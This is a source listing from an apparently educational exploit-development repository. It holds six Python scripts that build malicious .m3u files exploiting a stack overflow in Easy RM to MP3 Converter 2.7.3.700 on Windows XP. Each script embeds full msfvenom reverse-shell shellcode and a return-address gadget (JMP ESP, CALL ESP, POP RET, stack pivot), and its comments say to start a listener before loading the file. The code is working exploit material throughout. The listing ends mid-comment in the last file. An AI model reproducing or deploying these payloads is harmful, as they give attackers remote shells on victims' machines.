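# Repository tree (from the listing header):
#   Corelan/2. Jumpin To Shellcode/  01JMPESP.py 02CALLESP.py 03POPRET.py
#                                    04PUSHRET.py 05JMPREGOFF.py 06CUSTOM.py
#   Corelan/3. SEH Based Exploits/   MP3 Studio 1.0 .m3u SEH exploit.py  SEH.cpp  SEH.exe
#   FuzzySecurity/                   dvdxplayer_SEH_basedexploit.py
#                                    dvdxplayer_stackbasedexploit.py

# ---- /Corelan/2. Jumpin To Shellcode/01JMPESP.py ----
"""Easy RM to MP3 Converter 2.7.3.700 -- .m3u stack overflow, JMP ESP variant.

Writes ``mal.m3u``.  The saved return address is replaced with the address of
a ``JMP ESP`` gadget, so when the vulnerable function returns, execution
continues in the bytes that follow the return address on the stack.

Things to check before relying on this:

* ``OFFSET_XPSP3`` and the gadget address were measured on the author's
  XP SP3 box with that machine's copy of MSRMCcodec02.dll; the original
  header already warns that offsets may differ.  Re-verify both in a debugger.
* A hard-coded module address only works while the module loads at a fixed
  base (no ASLR) and the stack is executable (no DEP) -- an XP-era setup.
* The payload is a reverse shell to 127.0.0.1:443 (the author's lab
  loopback); regenerate it with msfvenom for any other LHOST/LPORT.
"""

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
#
# Held as *bytes* on purpose.  The original used a str and a text-mode file,
# which only writes these bytes verbatim on Python 2.  On Python 3 every byte
# >= 0x80 is re-encoded (UTF-8 locale) or rejected (cp1252 cannot encode
# 0x81/0x8d/0x8f/0x90/0x9d), so the shellcode on disk would be corrupted.
SHELLCODE = (
    b"\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
    b"\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
    b"\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
    b"\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
    b"\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
    b"\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
    b"\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
    b"\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
    b"\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
    b"\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
    b"\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
    b"\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
    b"\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
    b"\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
    b"\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
    b"\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
    b"\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
    b"\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
    b"\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
    b"\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
    b"\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
    b"\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
    b"\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
    b"\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
    b"\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
    b"\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
)

# JMP ESP in MSRMCcodec02.dll (0x01aaf23a, written little-endian).
JMP_ESP = b"\x3a\xf2\xaa\x01"

# Bytes of filler before the saved return address (XP SP3 measurement).
OFFSET_XPSP3 = 26071

# Four pad bytes between the return address and the NOP sled, kept exactly as
# in the original ("CCCC").  0x43 decodes as ``inc ebx``, so they are harmless
# if execution starts on them.  Presumably they cover a 4-byte gap between
# the overwritten return address and where ESP points -- verify in a debugger.
PAD = b"C" * 4

# The decoder stub at the start of SHELLCODE writes to the stack just below
# ESP (``fnstenv [esp-0xc]``, bytes d9 74 24 f4), so shellcode placed right at
# ESP can overwrite part of itself; the sled keeps it clear of that write.
NOP_SLED = b"\x90" * 16

OUTPUT = "mal.m3u"


def build_jmpesp_payload(offset: int = OFFSET_XPSP3, ret: bytes = JMP_ESP,
                         shellcode: bytes = SHELLCODE) -> bytes:
    """Return the .m3u contents: ``"A" * offset | ret | PAD | NOP_SLED | shellcode``.

    Args:
        offset: number of filler bytes before the saved return address.
        ret: 4-byte little-endian gadget address written over the return address.
        shellcode: payload placed after the NOP sled.

    Raises:
        ValueError: if ``ret`` is not exactly 4 bytes (anything else would
            shift every later field by the difference).
    """
    if len(ret) != 4:
        raise ValueError("ret must be a 4-byte little-endian address")
    return b"A" * offset + ret + PAD + NOP_SLED + shellcode


def main() -> None:
    """Write the payload to OUTPUT in binary mode (byte-exact, no newline translation)."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_jmpesp_payload())


if __name__ == "__main__":
    # Start a listener on 127.0.0.1:443 first, then load mal.m3u in the converter.
    main()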
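# ---- /Corelan/2. Jumpin To Shellcode/02CALLESP.py ----
"""Easy RM to MP3 Converter 2.7.3.700 -- .m3u stack overflow, CALL ESP variant.

Same layout as 01JMPESP.py, with a ``CALL ESP`` gadget instead of ``JMP ESP``.
``CALL`` pushes its return address (4 bytes at ESP-4, i.e. over the slot the
saved return address was just popped from) and then transfers to the old ESP,
so the bytes above ESP -- pad, sled, shellcode -- are not disturbed.

Offset and gadget address are the author's XP SP3 / MSRMCcodec02.dll values;
they assume a fixed module base (no ASLR) and an executable stack (no DEP).
Re-verify in a debugger.  Payload is a reverse shell to 127.0.0.1:443.
"""

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
# Bytes, not str: a text-mode str write only reproduces these bytes on
# Python 2; on Python 3 bytes >= 0x80 are re-encoded or rejected.
SHELLCODE = (
    b"\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
    b"\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
    b"\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
    b"\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
    b"\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
    b"\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
    b"\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
    b"\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
    b"\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
    b"\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
    b"\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
    b"\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
    b"\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
    b"\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
    b"\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
    b"\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
    b"\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
    b"\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
    b"\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
    b"\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
    b"\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
    b"\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
    b"\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
    b"\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
    b"\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
    b"\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
)

# CALL ESP in MSRMCcodec02.dll (0x01983f0f, little-endian).
CALL_ESP = b"\x0f\x3f\x98\x01"

# Filler bytes before the saved return address (XP SP3 measurement).
OFFSET_XPSP3 = 26071

# "CCCC" pad kept from the original; 0x43 is ``inc ebx`` and harmless.
PAD = b"C" * 4

# The decoder stub writes below ESP (``fnstenv [esp-0xc]``, d9 74 24 f4),
# so the shellcode needs a sled in front of it or it clobbers itself.
NOP_SLED = b"\x90" * 16

OUTPUT = "mal.m3u"


def build_callesp_payload(offset: int = OFFSET_XPSP3, ret: bytes = CALL_ESP,
                          shellcode: bytes = SHELLCODE) -> bytes:
    """Return ``"A" * offset | ret | PAD | NOP_SLED | shellcode``.

    Raises:
        ValueError: if ``ret`` is not exactly 4 bytes.
    """
    if len(ret) != 4:
        raise ValueError("ret must be a 4-byte little-endian address")
    return b"A" * offset + ret + PAD + NOP_SLED + shellcode


def main() -> None:
    """Write the payload to OUTPUT in binary mode."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_callesp_payload())


if __name__ == "__main__":
    # Start a listener on 127.0.0.1:443 first, then load mal.m3u in the converter.
    main()


# ---- /Corelan/2. Jumpin To Shellcode/03POPRET.py ----
"""Easy RM to MP3 Converter 2.7.3.700 -- .m3u stack overflow, POP RET variant.

The return address is overwritten with a ``POP <reg>; RET`` gadget.  The
intent of the layout is that the POP discards one dword and the RET then
lands on the ``JMP_ESP`` address embedded in the buffer, which in turn jumps
into the NOP sled and shellcode.

NOTE(review): the file places ``PAD`` ("CCCC") *and* the marker 0xdeadbeef
between the gadget and JMP_ESP.  If ESP points at PAD when the gadget runs,
POP consumes PAD and RET returns into 0xdeadbeef, which crashes.  The layout
therefore only works if ESP is already 4 bytes further along at that point
(or the gadget is really POP POP RET).  Bytes are kept exactly as in the
original; confirm the gadget's disassembly and ESP in a debugger before use.

Offset and addresses are the author's XP SP3 / MSRMCcodec02.dll values and
assume no ASLR / no DEP.  Payload is a reverse shell to 127.0.0.1:443.
"""

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
# Bytes, not str, so Python 3 writes them verbatim (see 02CALLESP.py note).
SHELLCODE = (
    b"\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
    b"\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
    b"\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
    b"\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
    b"\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
    b"\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
    b"\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
    b"\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
    b"\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
    b"\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
    b"\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
    b"\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
    b"\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
    b"\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
    b"\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
    b"\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
    b"\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
    b"\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
    b"\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
    b"\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
    b"\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
    b"\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
    b"\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
    b"\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
    b"\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
    b"\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
)

# POP RET in MSRMCcodec02.dll (0x0199b46c, little-endian).
POP_RET = b"\x6c\xb4\x99\x01"

# JMP ESP in MSRMCcodec02.dll (0x01aaf23a, little-endian).
JMP_ESP = b"\x3a\xf2\xaa\x01"

# Filler bytes before the saved return address (XP SP3 measurement).
OFFSET_XPSP3 = 26071

# "CCCC" pad kept from the original (``inc ebx`` x4 if executed).
PAD = b"C" * 4

# Recognisable marker dword (0xdeadbeef) kept from the original; it is the
# dword the POP is meant to discard -- see the review note in the docstring.
MARKER = b"\xef\xbe\xad\xde"

# Sled in front of the shellcode (the decoder stub writes below ESP).
NOP_SLED = b"\x90" * 16

OUTPUT = "mal.m3u"


def build_popret_payload(offset: int = OFFSET_XPSP3, shellcode: bytes = SHELLCODE) -> bytes:
    """Return ``"A" * offset | POP_RET | PAD | MARKER | JMP_ESP | NOP_SLED | shellcode``."""
    return b"A" * offset + POP_RET + PAD + MARKER + JMP_ESP + NOP_SLED + shellcode


def main() -> None:
    """Write the payload to OUTPUT in binary mode."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_popret_payload())


if __name__ == "__main__":
    # Start a listener on 127.0.0.1:443 first, then load mal.m3u in the converter.
    main()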
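# ---- /Corelan/2. Jumpin To Shellcode/04PUSHRET.py ----
"""Easy RM to MP3 Converter 2.7.3.700 -- .m3u stack overflow, PUSH/RET variant.

Same layout as 01JMPESP.py; only the gadget address and the offset differ.

NOTE(review): the original comments this gadget as "JMP ESP in
MSRMCcodec02.dll", but the address (0x01901d88) is not the JMP ESP used in
01JMPESP.py (0x01aaf23a) and the file name says PUSH RET.  Presumably this is
a ``PUSH ESP; RET`` sequence -- disassemble the address to confirm before use.

Offset and address are the author's XP SP3 / MSRMCcodec02.dll values and
assume no ASLR / no DEP.  Payload is a reverse shell to 127.0.0.1:443.
"""

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
# Bytes, not str: a text-mode str write only reproduces these bytes on
# Python 2; on Python 3 bytes >= 0x80 are re-encoded or rejected.
SHELLCODE = (
    b"\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
    b"\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
    b"\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
    b"\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
    b"\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
    b"\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
    b"\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
    b"\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
    b"\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
    b"\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
    b"\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
    b"\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
    b"\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
    b"\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
    b"\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
    b"\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
    b"\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
    b"\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
    b"\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
    b"\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
    b"\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
    b"\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
    b"\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
    b"\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
    b"\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
    b"\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
)

# Gadget in MSRMCcodec02.dll (0x01901d88, little-endian); see the review
# note above about what it actually disassembles to.
GADGET = b"\x88\x1d\x90\x01"

# Filler bytes before the saved return address (XP SP3 measurement; one byte
# less than the 26071 used by 01JMPESP.py -- taken from the original as-is).
OFFSET_XPSP3 = 26070

# "CCCC" pad kept from the original (``inc ebx`` x4 if executed).
PAD = b"C" * 4

# Sled in front of the shellcode: the decoder stub writes below ESP
# (``fnstenv [esp-0xc]``, d9 74 24 f4) and would otherwise hit itself.
NOP_SLED = b"\x90" * 16

OUTPUT = "mal.m3u"


def build_pushret_payload(offset: int = OFFSET_XPSP3, ret: bytes = GADGET,
                          shellcode: bytes = SHELLCODE) -> bytes:
    """Return ``"A" * offset | ret | PAD | NOP_SLED | shellcode``.

    Raises:
        ValueError: if ``ret`` is not exactly 4 bytes.
    """
    if len(ret) != 4:
        raise ValueError("ret must be a 4-byte little-endian address")
    return b"A" * offset + ret + PAD + NOP_SLED + shellcode


def main() -> None:
    """Write the payload to OUTPUT in binary mode."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_pushret_payload())


if __name__ == "__main__":
    # Start a listener on 127.0.0.1:443 first, then load mal.m3u in the converter.
    main()


# ---- /Corelan/2. Jumpin To Shellcode/05JMPREGOFF.py ----
"""Easy RM to MP3 Converter 2.7.3.700 -- .m3u stack overflow, "jmp [reg+off]" slot.

NOTE(review): in the listing this file is byte-for-byte identical to
04PUSHRET.py (same gadget 0x01901d88, same offset 26070, same layout).  The
``jmp [reg+offset]`` technique the file name refers to is not implemented
here; treat this as a placeholder that still exercises the 04 gadget.  The
original's "JMP ESP" comment is carried over from 01JMPESP.py and does not
match this address -- disassemble it to confirm.

Offset and address are the author's XP SP3 / MSRMCcodec02.dll values and
assume no ASLR / no DEP.  Payload is a reverse shell to 127.0.0.1:443.
"""

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
# Bytes, not str, so Python 3 writes them verbatim.
SHELLCODE = (
    b"\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
    b"\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
    b"\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
    b"\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
    b"\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
    b"\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
    b"\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
    b"\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
    b"\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
    b"\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
    b"\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
    b"\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
    b"\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
    b"\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
    b"\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
    b"\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
    b"\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
    b"\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
    b"\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
    b"\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
    b"\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
    b"\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
    b"\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
    b"\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
    b"\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
    b"\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
)

# Gadget in MSRMCcodec02.dll (0x01901d88, little-endian) -- same as 04PUSHRET.py.
GADGET = b"\x88\x1d\x90\x01"

# Filler bytes before the saved return address (XP SP3 measurement).
OFFSET_XPSP3 = 26070

# "CCCC" pad kept from the original (``inc ebx`` x4 if executed).
PAD = b"C" * 4

# Sled in front of the shellcode (the decoder stub writes below ESP).
NOP_SLED = b"\x90" * 16

OUTPUT = "mal.m3u"


def build_jmpregoff_payload(offset: int = OFFSET_XPSP3, ret: bytes = GADGET,
                            shellcode: bytes = SHELLCODE) -> bytes:
    """Return ``"A" * offset | ret | PAD | NOP_SLED | shellcode``.

    Raises:
        ValueError: if ``ret`` is not exactly 4 bytes.
    """
    if len(ret) != 4:
        raise ValueError("ret must be a 4-byte little-endian address")
    return b"A" * offset + ret + PAD + NOP_SLED + shellcode


def main() -> None:
    """Write the payload to OUTPUT in binary mode."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_jmpregoff_payload())


if __name__ == "__main__":
    # Start a listener on 127.0.0.1:443 first, then load mal.m3u in the converter.
    main()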
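# ---- /Corelan/2. Jumpin To Shellcode/06CUSTOM.py ----
"""Easy RM to MP3 Converter 2.7.3.700 -- .m3u stack overflow, stack-pivot variant.

Exercise from the original: pretend only 54 bytes are usable after ESP, too
little for the 351-byte shellcode, but a second copy of the file contents
sits further up the stack (the original says it "starts again at ESP + 261").
So the shellcode is placed near the *start* of the file, and the small window
after the return address only holds a stub that moves ESP up by 0x120 (288)
and jumps there.

Presumed landing, from the original's numbers (verify in a debugger): with
ESP at PAD when the stub runs, ``JMP ESP`` after ``ESP += 288`` lands 27
bytes into the second copy's leading "A" run (0x41 = ``inc ecx``, harmless),
which then runs through the 16-byte NOP sled at file offset 261 into the
shellcode at 277.

Offset and gadget address are the author's XP SP3 / MSRMCcodec02.dll values
and assume no ASLR / no DEP.  Payload is a reverse shell to 127.0.0.1:443.
"""

# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=127.0.0.1 -f python -b "\x00\x09\x0a" -v sc
# Size: 351
# Bytes, not str: a text-mode str write only reproduces these bytes on
# Python 2; on Python 3 bytes >= 0x80 are re-encoded or rejected.
SHELLCODE = (
    b"\xb8\xa4\x51\xde\xd3\xd9\xc7\xd9\x74\x24\xf4\x5b\x31"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xe7\x5f\x3c"
    b"\x26\x1b\xb7\x42\xc9\xe3\x48\x23\x43\x06\x79\x63\x37"
    b"\x43\x2a\x53\x33\x01\xc7\x18\x11\xb1\x5c\x6c\xbe\xb6"
    b"\xd5\xdb\x98\xf9\xe6\x70\xd8\x98\x64\x8b\x0d\x7a\x54"
    b"\x44\x40\x7b\x91\xb9\xa9\x29\x4a\xb5\x1c\xdd\xff\x83"
    b"\x9c\x56\xb3\x02\xa5\x8b\x04\x24\x84\x1a\x1e\x7f\x06"
    b"\x9d\xf3\x0b\x0f\x85\x10\x31\xd9\x3e\xe2\xcd\xd8\x96"
    b"\x3a\x2d\x76\xd7\xf2\xdc\x86\x10\x34\x3f\xfd\x68\x46"
    b"\xc2\x06\xaf\x34\x18\x82\x2b\x9e\xeb\x34\x97\x1e\x3f"
    b"\xa2\x5c\x2c\xf4\xa0\x3a\x31\x0b\x64\x31\x4d\x80\x8b"
    b"\x95\xc7\xd2\xaf\x31\x83\x81\xce\x60\x69\x67\xee\x72"
    b"\xd2\xd8\x4a\xf9\xff\x0d\xe7\xa0\x97\xe2\xca\x5a\x68"
    b"\x6d\x5c\x29\x5a\x32\xf6\xa5\xd6\xbb\xd0\x32\x18\x96"
    b"\xa5\xac\xe7\x19\xd6\xe5\x23\x4d\x86\x9d\x82\xee\x4d"
    b"\x5d\x2a\x3b\xc1\x0d\x84\x94\xa2\xfd\x64\x45\x4b\x17"
    b"\x6b\xba\x6b\x18\xa1\xd3\x06\xe3\x22\xa3\xd6\xeb\xb3"
    b"\x33\xd5\xeb\xb2\x78\x50\x0d\xde\x6e\x35\x86\x77\x16"
    b"\x1c\x5c\xe9\xd7\x8a\x19\x29\x53\x39\xde\xe4\x94\x34"
    b"\xcc\x91\x54\x03\xae\x34\x6a\xb9\xc6\xdb\xf9\x26\x16"
    b"\x95\xe1\xf0\x41\xf2\xd4\x08\x07\xee\x4f\xa3\x35\xf3"
    b"\x16\x8c\xfd\x28\xeb\x13\xfc\xbd\x57\x30\xee\x7b\x57"
    b"\x7c\x5a\xd4\x0e\x2a\x34\x92\xf8\x9c\xee\x4c\x56\x77"
    b"\x66\x08\x94\x48\xf0\x15\xf1\x3e\x1c\xa7\xac\x06\x23"
    b"\x08\x39\x8f\x5c\x74\xd9\x70\xb7\x3c\xe9\x3a\x95\x15"
    b"\x62\xe3\x4c\x24\xef\x14\xbb\x6b\x16\x97\x49\x14\xed"
    b"\x87\x38\x11\xa9\x0f\xd1\x6b\xa2\xe5\xd5\xd8\xc3\x2f"
)

# JMP ESP in MSRMCcodec02.dll (0x01aaf23a, little-endian).
JMP_ESP = b"\x3a\xf2\xaa\x01"

# Filler bytes before the saved return address (XP SP3 measurement).
OFFSET_XPSP3 = 26070

# Leading filler before the shellcode copy; sized so the second stack copy's
# sled is where the stub's jump expects it (see module docstring).
HEAD_FILLER = 261

# "CCCC" pad kept from the original (``inc ebx`` x4 if executed).
PAD = b"C" * 4

# The decoder stub writes below ESP (``fnstenv [esp-0xc]``, d9 74 24 f4);
# a sled in front of the shellcode keeps it clear of that write.
NOP_SLED = b"\x90" * 16

# Stack-adjust stub: ``add esp, 0x60`` three times (ESP += 0x120 = 288),
# then ``jmp esp``.  Three small adds are used instead of one because an
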